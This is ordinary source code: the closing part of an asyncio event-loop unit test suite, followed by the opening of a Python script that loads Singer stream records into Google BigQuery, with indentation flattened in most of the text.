transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
@unittest.skipUnderUwsgi()
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
with self.assertWarns(DeprecationWarning):
_, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
        h = loop.call_at(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
        # collections.abc.Coroutine, but lack cr_code or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
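    # Note: each concrete subclass below plugs in one implementation family of
    # these four hooks (the pure-Python events._py_* functions or, when the
    # _asyncio extension is importable, the C-accelerated events._c_* ones).
    # setUp() swaps the chosen hooks into both the events module and the
    # asyncio namespace, and tearDown() restores the saved originals, so every
    # test in this mixin runs once per implementation.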
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
target_bigquery.py
|
#!/usr/bin/env python3
import argparse
import io
import sys
import json
import logging
import collections
import threading
import http.client
import urllib
import pkg_resources
from jsonschema import validate
import singer
from oauth2client import tools
from tempfile import TemporaryFile
from google.cloud import bigquery
from google.cloud.bigquery.job import SourceFormat
from google.cloud.bigquery import Dataset, WriteDisposition
from google.cloud.bigquery import SchemaField
from google.cloud.bigquery import LoadJobConfig
from google.api_core import exceptions
try:
parser = argparse.ArgumentParser(parents=[tools.argparser])
parser.add_argument('-c', '--config', help='Config file', required=True)
flags = parser.parse_args()
except ImportError:
flags = None
logging.getLogger('googleapiclient.discovery_cache').setLevel(logging.ERROR)
logger = singer.get_logger()
SCOPES = ['https://www.googleapis.com/auth/bigquery','https://www.googleapis.com/auth/bigquery.insertdata']
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Singer BigQuery Target'
StreamMeta = collections.namedtuple('StreamMeta', ['schema', 'key_properties', 'bookmark_properties'])
def emit_state(state):
if state is not None:
line = json.dumps(state)
logger.debug('Emitting state {}'.format(line))
sys.stdout.write("{}\n".format(line))
sys.stdout.flush()
def clear_dict_hook(items):
return {k: v if v is not None else '' for k, v in items}
def define_schema(field, name):
schema_name = name
schema_type = "STRING"
schema_mode = "NULLABLE"
schema_description = None
schema_fields = ()
if 'type' not in field and 'anyOf' in field:
for types in field['anyOf']:
if types['type'] == 'null':
schema_mode = 'NULLABLE'
else:
field = types
if isinstance(field['type'], list):
if field['type'][0] == "null":
schema_mode = 'NULLABLE'
else:
            schema_mode = 'REQUIRED'
if len(field['type']) > 1:
schema_type = field['type'][1]
else:
schema_type = field['type'][0]
else:
schema_type = field['type']
if schema_type == "object":
schema_type = "RECORD"
schema_fields = tuple(build_schema(field))
if schema_type == "array":
schema_type = field.get('items').get('type')
if isinstance(schema_type, list):
schema_type = schema_type[-1]
schema_mode = "REPEATED"
if schema_type == "object":
schema_type = "RECORD"
schema_fields = tuple(build_schema(field.get('items')))
if schema_type == "string":
if "format" in field:
if field['format'] == "date-time":
schema_type = "timestamp"
if schema_type == 'number':
schema_type = 'FLOAT'
return (schema_name, schema_type, schema_mode, schema_description, schema_fields)
def build_schema(schema):
SCHEMA = []
for key in schema['properties'].keys():
if not (bool(schema['properties'][key])):
            # skip if we end up with an empty record.
continue
schema_name, schema_type, schema_mode, schema_description, schema_fields = define_schema(schema['properties'][key], key)
SCHEMA.append(SchemaField(schema_name, schema_type, schema_mode, schema_description, schema_fields))
return SCHEMA
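# Rough illustration of how build_schema() maps a Singer JSON schema to
# BigQuery SchemaField tuples (a sketch based on the rules above, not output
# captured from a real run; the property names are made up):
#
#   {"properties": {
#       "id":         {"type": ["null", "integer"]},
#       "updated_at": {"type": ["null", "string"], "format": "date-time"},
#       "amount":     {"type": ["null", "number"]},
#       "tags":       {"type": "array", "items": {"type": ["null", "string"]}}}}
#
# would become, approximately:
#
#   SchemaField('id', 'integer', 'NULLABLE', None, ())
#   SchemaField('updated_at', 'timestamp', 'NULLABLE', None, ())
#   SchemaField('amount', 'FLOAT', 'NULLABLE', None, ())
#   SchemaField('tags', 'string', 'REPEATED', None, ())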
def persist_lines_job(project_id, dataset_id, lines=None, truncate=False, validate_records=True):
state = None
schemas = {}
key_properties = {}
tables = {}
rows = {}
errors = {}
bigquery_client = bigquery.Client(project=project_id)
# try:
# dataset = bigquery_client.create_dataset(Dataset(dataset_ref)) or Dataset(dataset_ref)
# except exceptions.Conflict:
# pass
for line in lines:
try:
msg = singer.parse_message(line)
except json.decoder.JSONDecodeError:
logger.error("Unable to parse:\n{}".format(line))
raise
if isinstance(msg, singer.RecordMessage):
if msg.stream not in schemas:
raise Exception("A record for stream {} was encountered before a corresponding schema".format(msg.stream))
schema = schemas[msg.stream]
if validate_records:
validate(msg.record, schema)
# NEWLINE_DELIMITED_JSON expects literal JSON formatted data, with a newline character splitting each row.
